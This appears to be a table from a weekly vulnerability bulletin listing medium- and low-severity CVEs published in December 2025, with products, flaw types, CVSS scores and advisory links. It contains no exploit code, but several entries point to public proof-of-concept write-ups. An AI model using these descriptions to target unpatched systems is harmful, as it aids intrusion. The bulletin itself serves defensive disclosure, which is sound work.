| ketr--JEPaaS | A vulnerability was found in ketr JEPaaS up to 7.2.8. This impacts the function readAllPostil of the file /je/postil/postil/readAllPostil. Performing manipulation of the argument keyWord results in sql injection. The attack can be initiated remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-15 | 4.7 | CVE-2025-14694 | VDB-336412 \| ketr JEPaaS readAllPostil sql injection VDB-336412 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #707178 \| JEPaaS v7.2.8 SQL Injection https://github.com/c3p0ooo-Yiqiyin/JEPaaS-readAllPostil-SQL-Injection-Vulnerability/blob/main/README.md |
| atlaszz AI Photo Team--Galleryit App | A weakness has been identified in atlaszz AI Photo Team Galleryit App 1.3.8.2 on Android. This affects an unknown part of the component gallery.photogallery.pictures.vault.album. This manipulation causes path traversal. The attack needs to be launched locally. The exploit has been made available to the public and could be exploited. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-15 | 4.4 | CVE-2025-14698 | VDB-336416 \| atlaszz AI Photo Team Galleryit App gallery.photogallery.pictures.vault.album path traversal VDB-336416 \| CTI Indicators (IOB, IOC, TTP) Submit #706213 \| BETTER FITNESS LIMITED (https://atlaszz.com/) Galleryit - Photo Vault, Album (gallery.photogallery.pictures.vault.album) V1.3.8.2 Path Traversal https://github.com/Secsys-FDU/AF_CVEs/issues/2 |
| Smartbit CommV--Smartschool App | A flaw has been found in Smartbit CommV Smartschool App up to 10.4.4. Impacted is an unknown function of the component be.smartschool.mobile.SplashActivity. Executing manipulation can lead to path traversal. The attack requires local access. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-15 | 4.4 | CVE-2025-14702 | VDB-336419 \| Smartbit CommV Smartschool App be.smartschool.mobile.SplashActivity path traversal VDB-336419 \| CTI Indicators (IOB, IOC, TTP) Submit #706220 \| Smartbit(http://www.smartschool.be/) Smartschool (be.smartschool.mobile) V10.4.4 Path Traversal https://github.com/Secsys-FDU/AF_CVEs/issues/4 |
| CTCMS--Content Management System | A vulnerability was identified in CTCMS Content Management System up to 2.1.2. The affected element is the function Save of the file /ctcms/libs/Ct_App.php of the component Backend App Configuration Module. The manipulation of the argument CT_App_Paytype leads to code injection. Remote exploitation of the attack is possible. The exploit is publicly available and might be used. | 2025-12-15 | 4.7 | CVE-2025-14729 | VDB-336486 \| CTCMS Content Management System Backend App Configuration Ct_App.php save code injection VDB-336486 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #707104 \| ctcms 2.1.2 Command Injection https://note-hxlab.wetolink.com/share/R3y6uiOuuYbA |
| CTCMS--Content Management System | A security flaw has been discovered in CTCMS Content Management System up to 2.1.2. The impacted element is an unknown function in the library /ctcms/libs/Ct_Config.php of the component Backend System Configuration Module. The manipulation of the argument Cj_Add/Cj_Edit results in code injection. The attack can be executed remotely. The exploit has been released to the public and may be exploited. | 2025-12-15 | 4.7 | CVE-2025-14730 | VDB-336487 \| CTCMS Content Management System Backend System Configuration Ct_Config.php code injection VDB-336487 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #707105 \| ctcms 2.1.2 Command Injection https://note-hxlab.wetolink.com/share/87u6f02Gho0K |
| nestornoe--Amazon affiliate lite Plugin | The "Amazon affiliate lite Plugin" plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 1.0.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. | 2025-12-20 | 4.4 | CVE-2025-14735 | https://www.wordfence.com/threat-intel/vulnerabilities/id/0c23cc3c-3c76-4ba8-8fa6-6ed0507a35c9?source=cve https://plugins.trac.wordpress.org/browser/afiliados-de-amazon-lite/trunk/ADAL-core.php?rev=1952216#L105 https://plugins.trac.wordpress.org/browser/afiliados-de-amazon-lite/trunk/ADAL-core.php?rev=1952216#L236 |
| Ningyuanda--TC155 | A vulnerability has been found in Ningyuanda TC155 57.0.2.0. The affected element is an unknown function of the component RTSP Live Video Stream Endpoint. Such manipulation leads to improper authentication. The attack must be carried out from within the local network. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-16 | 4.3 | CVE-2025-14746 | VDB-336519 \| Ningyuanda TC155 RTSP Live Video Stream Endpoint improper authentication VDB-336519 \| CTI Indicators (IOB, IOC) Submit #707195 \| Shenzhen Ningyuanda Technology Co., Ltd. TC155 IP Camera Firmware Version 57.0.2.0 Missing Critical Step in Authentication https://github.com/pwnpwnpur1n/IoT-advisories/blob/main/TC155-Unauth-RTSP.md |
| Ningyuanda--TC155 | A vulnerability was found in Ningyuanda TC155 57.0.2.0. The impacted element is an unknown function of the component RTSP Service. Performing manipulation results in denial of service. The attack must originate from the local network. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-16 | 4.3 | CVE-2025-14747 | VDB-336520 \| Ningyuanda TC155 RTSP Service denial of service VDB-336520 \| CTI Indicators (IOB, IOC) Submit #707196 \| Shenzhen Ningyuanda Technology Co., Ltd. TC155 IP Camera Firmware version: 57.0.2.0 Improper Check or Handling of Exceptional Conditions https://github.com/pwnpwnpur1n/IoT-advisories/blob/main/TC155-Unauth-Malformed-RTSP-Describe-Request.md |
| ZZCMS--ZZCMS | A vulnerability has been found in ZZCMS 2025. Affected by this issue is the function stripfxg of the file /admin/siteconfig.php of the component Backend Website Settings Module. Such manipulation of the argument icp leads to code injection. The attack can be executed remotely. The exploit has been disclosed to the public and may be used. | 2025-12-17 | 4.7 | CVE-2025-14837 | VDB-336987 \| ZZCMS Backend Website Settings siteconfig.php stripfxg code injection VDB-336987 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #711655 \| zzcms zzcms2025 Command Injection https://note-hxlab.wetolink.com/share/ekNgcv2wVBya |
| Advantech--WebAccess/SCADA | Advantech WebAccess/SCADA is vulnerable to absolute directory traversal, which may allow an attacker to determine the existence of arbitrary files. | 2025-12-18 | 4.3 | CVE-2025-14848 | https://www.advantech.com/en-us/support/details/installation?id=1-MS9MJV https://www.cisa.gov/news-events/ics-advisories/icsa-25-352-06 https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2025/icsa-25-352-06.json |
| CodeAstro--Real Estate Management System | A vulnerability was identified in CodeAstro Real Estate Management System 1.0. The impacted element is an unknown function of the file /admin/useragentdelete.php of the component Administrator Endpoint. The manipulation leads to sql injection. The attack can be initiated remotely. The exploit is publicly available and might be used. | 2025-12-18 | 4.7 | CVE-2025-14897 | VDB-337422 \| CodeAstro Real Estate Management System Administrator Endpoint useragentdelete.php sql injection VDB-337422 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #715668 \| PHPGurukul CodeAstro Real Estate Management System 1.0 Injection https://github.com/YZS17/CVE/blob/main/CodeAstro_Real_Estate_Management_System/sqli-useragentdelete.md https://codeastro.com/ |
| CodeAstro--Real Estate Management System | A security flaw has been discovered in CodeAstro Real Estate Management System 1.0. This affects an unknown function of the file /admin/userbuilderdelete.php of the component Administrator Endpoint. The manipulation results in sql injection. The attack can be launched remotely. The exploit has been released to the public and may be exploited. | 2025-12-18 | 4.7 | CVE-2025-14898 | VDB-337423 \| CodeAstro Real Estate Management System Administrator Endpoint userbuilderdelete.php sql injection VDB-337423 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #715670 \| PHPGurukul CodeAstro Real Estate Management System 1.0 SQL Injection https://github.com/YZS17/CVE/blob/main/CodeAstro_Real_Estate_Management_System/sqli-userbuilderdelete.php.md https://codeastro.com/ |
| CodeAstro--Real Estate Management System | A weakness has been identified in CodeAstro Real Estate Management System 1.0. This impacts an unknown function of the file /admin/stateadd.php of the component Administrator Endpoint. This manipulation causes sql injection. The attack may be initiated remotely. The exploit has been made available to the public and could be exploited. | 2025-12-19 | 4.7 | CVE-2025-14899 | VDB-337424 \| CodeAstro Real Estate Management System Administrator Endpoint stateadd.php sql injection VDB-337424 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #715671 \| PHPGurukul CodeAstro Real Estate Management System 1.0 SQL Injection https://github.com/YZS17/CVE/blob/main/CodeAstro_Real_Estate_Management_System/stateadd.php-sqli.md https://codeastro.com/ |
| CodeAstro--Real Estate Management System | A security vulnerability has been detected in CodeAstro Real Estate Management System 1.0. Affected is an unknown function of the file /admin/userdelete.php of the component Administrator Endpoint. Such manipulation of the argument ID leads to sql injection. The attack may be launched remotely. The exploit has been disclosed publicly and may be used. | 2025-12-19 | 4.7 | CVE-2025-14900 | VDB-337425 \| CodeAstro Real Estate Management System Administrator Endpoint userdelete.php sql injection VDB-337425 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #715672 \| PHPGurukul CodeAstro Real Estate Management System 1.0 SQL Injection https://github.com/YZS17/CVE/blob/main/CodeAstro_Real_Estate_Management_System/userdelete-sqli.md https://codeastro.com/ |
| JeecgBoot--JeecgBoot | A weakness has been identified in JeecgBoot up to 3.9.0. The impacted element is the function SysUserOnlineController of the file jeecg-boot/jeecg-module-system/jeecg-system-biz/src/main/java/org/jeecg/modules/system/controller/SysUserOnlineController.java. Executing manipulation can lead to unauthorized management of user sessions. The attack can be launched remotely. The exploit has been made available to the public and could be exploited. This patch is called b686f9fbd1917edffe5922c6362c817a9361cfbd. Applying a patch is advised to resolve this issue. | 2025-12-19 | 4.3 | CVE-2025-14909 | VDB-337433 \| JeecgBoot SysUserOnlineController.java SysUserOnlineController user session VDB-337433 \| CTI Indicators (IOB, IOC, IOA) Submit #715743 \| jeecgboot 3.9.0 bfla https://github.com/jeecgboot/JeecgBoot/issues/9195 https://github.com/jeecgboot/JeecgBoot/issues/9195#issue-3719368751 https://github.com/jeecgboot/JeecgBoot/commit/b686f9fbd1917edffe5922c6362c817a9361cfbd |
| Edimax--BR-6208AC | A vulnerability was detected in Edimax BR-6208AC 1.02. This impacts the function handle_retr of the component FTP Daemon Service. The manipulation results in path traversal. The attack may be launched remotely. The exploit is now public and may be used. Edimax confirms this issue: "This product is no longer available in the market and has been discontinued for five years. Consequently, Edimax no longer provides technical support, firmware updates, or security patches for this specific model. However, to ensure the safety of our remaining active users, we acknowledge this report and will take the following mitigation actions: (A) We will issue an official security advisory on our support website. (B) We will strongly advise users to disable the FTP service on this device to mitigate the reported risk, by which the product will still work for common use. (C) We will recommend users upgrade to newer, supported models." This vulnerability only affects products that are no longer supported by the maintainer. | 2025-12-19 | 4.3 | CVE-2025-14910 | VDB-337435 \| Edimax BR-6208AC FTP Daemon Service handle_retr path traversal VDB-337435 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #713704 \| Edimax BR-6208AC V2_1.02 Absolute Path Traversal https://tzh00203.notion.site/EDIMAX-BR-6208AC-V2_1-02-Path-Traversal-Vulnerability-in-FTPd-2c4b5c52018a80fb8812f7d510abf558?source=copy_link |
| code-projects--Online Appointment Booking System | A vulnerability was found in code-projects Online Appointment Booking System 1.0. Impacted is an unknown function of the file /admin/deletemanager.php. The manipulation of the argument managername results in sql injection. The attack may be performed from remote. The exploit has been made public and could be used. | 2025-12-19 | 4.7 | CVE-2025-14939 | VDB-337519 \| code-projects Online Appointment Booking System deletemanager.php sql injection VDB-337519 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #715796 \| code-projects Online Appointment Booking System V1.0 SQL injection https://github.com/wegitlab/cve/issues/1 https://code-projects.org/ |
| Red Hat--Red Hat Enterprise Linux 10 | A flaw was found in libnbd. A malicious actor could exploit this by convincing libnbd to open a specially crafted Uniform Resource Identifier (URI). This vulnerability arises because non-standard hostnames starting with '-o' are incorrectly interpreted as arguments to the Secure Shell (SSH) process, rather than as hostnames. This could lead to arbitrary code execution with the privileges of the user running libnbd. | 2025-12-19 | 4.8 | CVE-2025-14946 | https://access.redhat.com/security/cve/CVE-2025-14946 RHBZ#2423789 https://libguestfs.org/libnbd-release-notes-1.24.1.html#Security |
| code-projects--Simple Stock System | A flaw has been found in code-projects Simple Stock System 1.0. The impacted element is an unknown function of the file /market/chatuser.php. This manipulation causes cross site scripting. The attack is possible to be carried out remotely. The exploit has been published and may be used. | 2025-12-19 | 4.3 | CVE-2025-14962 | VDB-337598 \| code-projects Simple Stock System chatuser.php cross site scripting VDB-337598 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #717640 \| Code-projects Simple Stock System v1.0 Reflective XSS vulnerability https://github.com/wyxclcw/CVE/issues/1 https://code-projects.org/ |
| FastAdmin--FastAdmin | A vulnerability was determined in FastAdmin up to 1.7.0.20250506. Affected is the function selectpage of the file application/common/controller/Backend.php of the component Backend Controller. Executing manipulation of the argument custom/searchField can lead to sql injection. It is possible to launch the attack remotely. The exploit has been publicly disclosed and may be utilized. | 2025-12-19 | 4.7 | CVE-2025-14966 | VDB-337601 \| FastAdmin Backend Controller Backend.php selectpage sql injection VDB-337601 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #718309 \| FastAdmin 1.7.0.20250506 SQL Injection Submit #718339 \| FastAdmin 1.7.0.20250506 SQL Injection (Duplicate) https://note-hxlab.wetolink.com/share/1924AEdgGFYu https://note-hxlab.wetolink.com/share/auEz57nwynMq |
| SeaCMS--SeaCMS | A vulnerability was found in SeaCMS up to 13.3. The impacted element is an unknown function of the file admin_video.php. Performing manipulation of the argument e_id results in sql injection. The attack can be carried out remotely. The exploit has been made public and could be used. | 2025-12-21 | 4.7 | CVE-2025-15003 | VDB-337708 \| SeaCMS admin_video.php sql injection VDB-337708 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #716084 \| SeaCMS 13.3 SQL Injection https://note-hxlab.wetolink.com/share/aTI1wPFLm7FG |
| Nozomi Networks--Guardian | A Stored HTML Injection vulnerability was discovered in the Time Machine Snapshot Diff functionality due to improper validation of network traffic data. An unauthenticated attacker can send specially crafted network packets at two different times to inject HTML tags into asset attributes across two snapshots. Exploitation requires a victim to use the Time Machine Snapshot Diff feature on those specific snapshots and perform specific GUI actions, at which point the injected HTML renders in their browser, enabling phishing and open redirect attacks. Full XSS exploitation is prevented by input validation and Content Security Policy. Attack complexity is high due to multiple required conditions. | 2025-12-18 | 4.7 | CVE-2025-40891 | https://security.nozominetworks.com/NN-2025:12-01 |
| HCL Software--BigFix Remote Control | Improper management of Content Security Policy in HCL BigFix Remote Control Lite Web Portal (versions 10.1.0.0326 and lower) may allow the execution of malicious code in web pages. | 2025-12-17 | 4.7 | CVE-2025-59849 | https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0127332 |
| BullWall--Ransomware Containment | BullWall Ransomware Containment relies on the number of file modifications to trigger detection. An authenticated attacker could encrypt a single large file without triggering a detection alert. Versions 4.6.0.0, 4.6.0.6, 4.6.0.7, and 4.6.1.4 were confirmed to be affected; other versions before and after may also be affected. | 2025-12-18 | 4.3 | CVE-2025-62002 | url url |
| Mattermost--Mattermost | Mattermost versions 11.0.x <= 11.0.4, 10.12.x <= 10.12.2, 10.11.x <= 10.11.6 and Mattermost Calls versions <=1.10.0 fail to implement CSRF protection on the Calls widget page, which allows an authenticated attacker to initiate calls and inject messages into channels or direct messages via a malicious webpage or crafted link. | 2025-12-17 | 4.3 | CVE-2025-62190 | https://mattermost.com/security-updates |
| HappyDevs--TempTool | Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in HappyDevs TempTool allows Retrieve Embedded Sensitive Data. This issue affects TempTool: from n/a through 1.3.1. | 2025-12-21 | 4.3 | CVE-2025-62955 | https://vdp.patchstack.com/database/wordpress/plugin/current-template-name/vulnerability/wordpress-temptool-show-current-template-info-plugin-1-3-1-sensitive-data-exposure-vulnerability?_s_id=cve |
| RadiusTheme--Radius Blocks | Authorization Bypass Through User-Controlled Key vulnerability in RadiusTheme Radius Blocks allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Radius Blocks: from n/a through 2.2.1. | 2025-12-18 | 4.3 | CVE-2025-64282 | https://vdp.patchstack.com/database/wordpress/plugin/radius-blocks/vulnerability/wordpress-radius-blocks-plugin-2-2-1-insecure-direct-object-references-idor-vulnerability?_s_id=cve |
| Palantir--com.palantir.controlpanel:control-panel | Control Panel provides an API for pre-registering into an enrollment and organization prior to a user's first login. The API for creating users checks that the account requesting a user creation has `edit` on the enrollment-level user directory, but is missing a separate check that the enrollment editor has access (or belongs to) the organization that they are adding a user to. | 2025-12-18 | 4.1 | CVE-2025-64400 | https://palantir.safebase.us/?tcuUid=52a9fd2f-1868-48cb-af01-93c589160e19 |
| Advantech--WebAccess/SCADA | Advantech WebAccess/SCADA is vulnerable to directory traversal, which may allow an attacker to determine the existence of arbitrary files. | 2025-12-18 | 4.3 | CVE-2025-67653 | https://www.advantech.com/en-us/support/details/installation?id=1-MS9MJV https://www.cisa.gov/news-events/ics-advisories/icsa-25-352-06 https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2025/icsa-25-352-06.json |
| Esri--ArcGIS Web AppBuilder (Developer Edition) | There is an HTML injection issue in Esri ArcGIS Web AppBuilder developer edition versions prior to 2.30 that allows a remote, unauthenticated attacker to potentially entice a user to click a link that causes arbitrary HTML to render in a victim's browser. There is no evidence of JavaScript execution, which limits the impact. At the time of submission, ArcGIS Web App Builder developer edition is retired. ArcGIS Web App Builder 2.30 is not susceptible to this vulnerability. | 2025-12-19 | 4.7 | CVE-2025-67712 | https://support.esri.com/en-us/knowledge-base/deprecation-arcgis-web-appbuilder-000036340 |
| WeblateOrg--weblate | Weblate is a web based localization tool. In versions prior to 5.15, it was possible to retrieve user notification settings or list all users via API. Version 5.15 fixes the issue. | 2025-12-16 | 4.3 | CVE-2025-67715 | https://github.com/WeblateOrg/weblate/security/advisories/GHSA-3pmh-24wp-xpf4 https://github.com/WeblateOrg/weblate/pull/17256 |
| Mintlify--Mintlify Platform | The Deployment Infrastructure in Mintlify Platform before 2025-11-15 allows remote attackers to bypass security patches and execute downgrade attacks via predictable deployment identifiers on the Vercel preview domain. An attacker can identify the URL structure of a previous deployment that contains unpatched vulnerabilities. By browsing directly to the specific git-ref or deployment-id subdomain, the attacker can force the application to load the vulnerable version. | 2025-12-19 | 4.9 | CVE-2025-67846 | https://www.mintlify.com/docs/changelog https://www.mintlify.com/blog/working-with-security-researchers-november-2025 https://kibty.town/blog/mintlify/ https://news.ycombinator.com/item?id=46317098 |
| capstone-engine--capstone | Capstone is a disassembly framework. In versions 6.0.0-Alpha5 and prior, Skipdata length is not bounds-checked, so a user-provided skipdata callback can make cs_disasm/cs_disasm_iter memcpy more than 24 bytes into cs_insn.bytes, causing a heap buffer overflow in the disassembly path. Commit cbef767ab33b82166d263895f24084b75b316df3 fixes the issue. | 2025-12-17 | 4.8 | CVE-2025-67873 | https://github.com/capstone-engine/capstone/security/advisories/GHSA-hj6g-v545-v7jg https://github.com/capstone-engine/capstone/commit/cbef767ab33b82166d263895f24084b75b316df3 |
| capstone-engine--capstone | Capstone is a disassembly framework. In versions 6.0.0-Alpha5 and prior, an unchecked vsnprintf return in SStream_concat lets a malicious cs_opt_mem.vsnprintf drive SStream's index negative or past the end, leading to a stack buffer underflow/overflow when the next write occurs. Commit 2c7797182a1618be12017d7d41e0b6581d5d529e fixes the issue. | 2025-12-17 | 4.8 | CVE-2025-68114 | https://github.com/capstone-engine/capstone/security/advisories/GHSA-85f5-6xr3-q76r https://github.com/capstone-engine/capstone/commit/2c7797182a1618be12017d7d41e0b6581d5d529e |
| Elastic--Kibana | Improper Authorization (CWE-285) in Kibana can lead to privilege escalation (CAPEC-233) by allowing an authenticated user to change a document's sharing type to "global," even though they do not have permission to do so, making it visible to everyone in the space via a crafted HTTP request. | 2025-12-18 | 4.3 | CVE-2025-68386 | https://discuss.elastic.co/t/kibana-8-19-8-9-1-8-and-9-2-2-security-update-esa-2025-38/384186 |
| Elastic--Elasticsearch | Allocation of Resources Without Limits or Throttling (CWE-770) in Elasticsearch can allow an authenticated user with snapshot restore privileges to cause Excessive Allocation (CAPEC-130) of memory and a denial of service (DoS) via a crafted HTTP request. | 2025-12-18 | 4.9 | CVE-2025-68390 | https://discuss.elastic.co/t/elasticsearch-8-19-8-9-1-8-and-9-2-2-security-update-esa-2025-37/384185 |
| Elastic--Kibana | Improper Authorization (CWE-285) in Kibana can lead to privilege escalation (CAPEC-233) by allowing an authenticated user to bypass intended permission restrictions via a crafted HTTP request. This allows an attacker who lacks the live queries - read permission to successfully retrieve the list of live queries. | 2025-12-18 | 4.3 | CVE-2025-68422 | https://discuss.elastic.co/t/kibana-8-19-7-9-1-7-and-9-2-1-security-update-esa-2025-39/384187 |
| Biopython--Biopython | Bio.Entrez in Biopython through 186 allows doctype XXE. | 2025-12-18 | 4.9 | CVE-2025-68463 | https://github.com/biopython/biopython/issues/5109 |
| Utarit Informatics Services Inc.--SoliClub | Missing Authorization vulnerability in Utarit Informatics Services Inc. SoliClub allows Privilege Abuse. This issue affects SoliClub: before 5.3.7. | 2025-12-18 | 4.3 | CVE-2025-7047 | https://www.usom.gov.tr/bildirim/tr-25-0466 |
| JobCareer--WP JobHunt | The WP JobHunt plugin for WordPress, used by the JobCareer theme, is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 7.7 via the 'cs_update_application_status_callback' due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with Candidate-level access and above, to send a site-generated email with injected HTML to any user. | 2025-12-20 | 4.3 | CVE-2025-7733 | https://www.wordfence.com/threat-intel/vulnerabilities/id/409bcd8c-6cd3-4022-a67f-57e901c83d66?source=cve https://themeforest.net/item/jobcareer-job-board-responsive-wordpress-theme/14221636 |

| Primary Vendor -- Product | Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
| Mattermost--Mattermost | Mattermost Desktop App versions <6.0.0 fail to sanitize sensitive information from Mattermost logs and clear data on server deletion which allows an attacker with access to the users system to gain access to potentially sensitive information via reading the application logs. | 2025-12-17 | 3.3 | CVE-2025-13321 | https://mattermost.com/security-updates |
| Mattermost--Mattermost | Mattermost Desktop App versions <6.0.0 fail to enable the Hardened Runtime on the Mattermost Desktop App when packaged for Mac App Store which allows an attacker to inherit TCC permissions via copying the binary to a tmp folder. | 2025-12-17 | 3.9 | CVE-2025-13326 | https://mattermost.com/security-updates |
| Mattermost--Mattermost | Mattermost versions 10.11.x <= 10.11.6 and Mattermost GitHub plugin versions <=2.4.0 fail to validate plugin bot identity in reaction forwarding which allows attackers to hijack the GitHub reaction feature to make users add reactions to arbitrary GitHub objects via crafted notification posts. | 2025-12-17 | 3 | CVE-2025-13352 | https://mattermost.com/security-updates |
| LINE Corporation--LINE client for Android | LINE client for Android versions from 13.8 to 15.5 is vulnerable to UI spoofing in the in-app browser where a specific layout could obscure the full-screen warning prompt, potentially allowing attackers to conduct phishing attacks. | 2025-12-15 | 3.4 | CVE-2025-14019 | https://hackerone.com/reports/3062270 |
| LINE Corporation--LINE client for iOS | LINE client for iOS prior to 15.19 allows UI spoofing due to inconsistencies between the navigation state and the in-app browser's user interface, which could create confusion about the trust context of displayed pages or interactive elements under specific conditions. | 2025-12-15 | 3.1 | CVE-2025-14023 | https://hackerone.com/reports/3260386 |
| Shenzhen Sixun Software--Sixun Shanghui Group Business Management System | A security flaw has been discovered in Shenzhen Sixun Software Sixun Shanghui Group Business Management System 4.10.24.3. Affected by this issue is some unknown functionality of the file /ExportFiles/. The manipulation makes files or directories accessible. The attack may be launched remotely. This attack is characterized by high complexity. The exploitation is known to be difficult. The exploit has been released to the public and may be exploited. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-15 | 3.7 | CVE-2025-14697 | VDB-336415 \| Shenzhen Sixun Software Sixun Shanghui Group Business Management System ExportFiles file access VDB-336415 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #705619 \| Shenzhen Sixun Software Co., Ltd. Sissyun Shanghui 7 Online Business System 4.10.24.3 Unauthorized https://github.com/zhangbuneng/Sissyun-Shanghui-7-Unauthorized-password-modificationfication-vulnerability./issues/2 https://github.com/zhangbuneng/Sissyun-Shanghui-7-Unauthorized-password-modificationfication-vulnerability./issues/2#issue-3689006583 |
| OFFIS--DCMTK | A flaw has been found in OFFIS DCMTK up to 3.6.9. The impacted element is the function DcmQueryRetrieveIndexDatabaseHandle::startFindRequest/DcmQueryRetrieveIndexDatabaseHandle::startMoveRequest in the library dcmqrdb/libsrc/dcmqrdbi.cc of the component dcmqrscp. This manipulation causes a null pointer dereference. The attack requires local access. Upgrading to version 3.7.0 is sufficient to resolve this issue. Patch name: ffb1a4a37d2c876e3feeb31df4930f2aed7fa030. You should upgrade the affected component. | 2025-12-18 | 3.3 | CVE-2025-14841 | VDB-337004 \| OFFIS DCMTK dcmqrscp dcmqrdbi.cc startMoveRequest null pointer dereference VDB-337004 \| CTI Indicators (IOB, IOC, IOA) Submit #714605 \| OFFIS DCMTK 3.6.9 Denial of Service Submit #714634 \| OFFIS DCMTK 3.6.9 Denial of Service (Duplicate) https://support.dcmtk.org/redmine/issues/1183 https://github.com/DCMTK/dcmtk/commit/ffb1a4a37d2c876e3feeb31df4930f2aed7fa030 https://github.com/DCMTK/dcmtk/releases/tag/DCMTK-3.7.0 |
| Open5GS--Open5GS | A flaw has been found in Open5GS up to 2.7.5. This impacts the function ogs_pfcp_handle_create_pdr in the library lib/pfcp/handler.c of the component FAR-ID Handler. Executing manipulation can lead to a null pointer dereference. The attack may be performed remotely. The attack requires a high level of complexity. Exploitation is said to be difficult. The exploit has been published and may be used. The patch is identified as 93a9fd98a8baa94289be3b982028201de4534e32. It is advisable to apply the patch to correct this issue. | 2025-12-19 | 3.1 | CVE-2025-14953 | VDB-337589 \| Open5GS FAR-ID handler.c ogs_pfcp_handle_create_pdr null pointer dereference VDB-337589 \| CTI Indicators (IOB, IOC, IOA) Submit #716799 \| Open5GS v2.7.5 Reachable Assertion https://github.com/open5gs/open5gs/issues/4179 https://github.com/open5gs/open5gs/issues/4179#issuecomment-3614868758 https://github.com/open5gs/open5gs/issues/4179#issue-3666399406 https://github.com/open5gs/open5gs/commit/93a9fd98a8baa94289be3b982028201de4534e32 |
| Open5GS--Open5GS | A vulnerability has been found in Open5GS up to 2.7.5. Affected is the function ogs_pfcp_pdr_find_or_add/ogs_pfcp_far_find_or_add/ogs_pfcp_urr_find_or_add/ogs_pfcp_qer_find_or_add in the library lib/pfcp/context.c of the component QER/FAR/URR/PDR. The manipulation leads to a reachable assertion. It is possible to initiate the attack remotely. The attack's complexity is rated as high. Exploitation is considered difficult. The exploit has been disclosed to the public and may be used. The identifier of the patch is 442369dcd964f03d95429a6a01a57ed21f7779b7. Applying the patch is the recommended action to fix this issue. | 2025-12-19 | 3.7 | CVE-2025-14954 | VDB-337590 \| Open5GS QER/FAR/URR/PDR context.c ogs_pfcp_qer_find_or_add assertion VDB-337590 \| CTI Indicators (IOB, IOC, IOA) Submit #716810 \| Open5GS v2.7.5 CWE-617 Reachable Assertion https://github.com/open5gs/open5gs/issues/4181 https://github.com/open5gs/open5gs/issues/4181#issuecomment-3615646842 https://github.com/open5gs/open5gs/issues/4181#issue-3667069101 https://github.com/open5gs/open5gs/commit/442369dcd964f03d95429a6a01a57ed21f7779b7 |
| Open5GS--Open5GS | A vulnerability was found in Open5GS up to 2.7.5. Affected by this vulnerability is the function ogs_pfcp_handle_create_pdr in the library lib/pfcp/handler.c of the component PFCP. The manipulation results in improper initialization. It is possible to launch the attack remotely. This attack is characterized by high complexity. The exploitation appears to be difficult. The exploit has been made public and could be used. The patch is identified as 773117aa5472af26fc9f80e608d3386504c3bdb7. It is best practice to apply a patch to resolve this issue. | 2025-12-19 | 3.7 | CVE-2025-14955 | VDB-337591 \| Open5GS PFCP handler.c ogs_pfcp_handle_create_pdr initialization VDB-337591 \| CTI Indicators (IOB, IOC, IOA) Submit #716841 \| Open5GS v2.7.5 Reachable Assertion https://github.com/open5gs/open5gs/issues/4182 https://github.com/open5gs/open5gs/issues/4182#issuecomment-3616081878 https://github.com/open5gs/open5gs/issues/4182#issue-3670797098 https://github.com/open5gs/open5gs/commit/773117aa5472af26fc9f80e608d3386504c3bdb7 |
| WebAssembly--Binaryen | A vulnerability was identified in WebAssembly Binaryen up to 125. This affects the function IRBuilder::makeLocalGet/IRBuilder::makeLocalSet/IRBuilder::makeLocalTee of the file src/wasm/wasm-ir-builder.cpp of the component IRBuilder. Such manipulation of the argument Index leads to a null pointer dereference. Local access is required for this attack. The exploit is publicly available and might be used. The name of the patch is 6fb2b917a79578ab44cf3b900a6da4c27251e0d4. Applying a patch is advised to resolve this issue. | 2025-12-19 | 3.3 | CVE-2025-14957 | VDB-337593 \| WebAssembly Binaryen IRBuilder wasm-ir-builder.cpp makeLocalTee null pointer dereference VDB-337593 \| CTI Indicators (IOB, IOC, IOA) Submit #717317 \| WebAssembly binaryen e7706b3 Memory Corruption Submit #717319 \| WebAssembly binaryen e7706b3 Memory Corruption (Duplicate) https://github.com/WebAssembly/binaryen/issues/8090 https://github.com/WebAssembly/binaryen/pull/8099 https://github.com/oneafter/1204/blob/main/af1 https://github.com/WebAssembly/binaryen/commit/6fb2b917a79578ab44cf3b900a6da4c27251e0d4 |
| HCL Software--BigFix Remote Control | Improper management of Path-relative stylesheet import in HCL BigFix Remote Control Lite Web Portal (versions 10.1.0.0326 and lower) may allow the execution of malicious code in certain web pages. | 2025-12-17 | 3.7 | CVE-2025-55254 | https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0127332 |
| Mattermost--Mattermost | Mattermost versions 10.11.x <= 10.11.4 fail to validate redirect URLs on the /error page, which allows an attacker to redirect a victim to a malicious site via a crafted link opened in a new tab. | 2025-12-17 | 3.1 | CVE-2025-62690 | https://mattermost.com/security-updates |
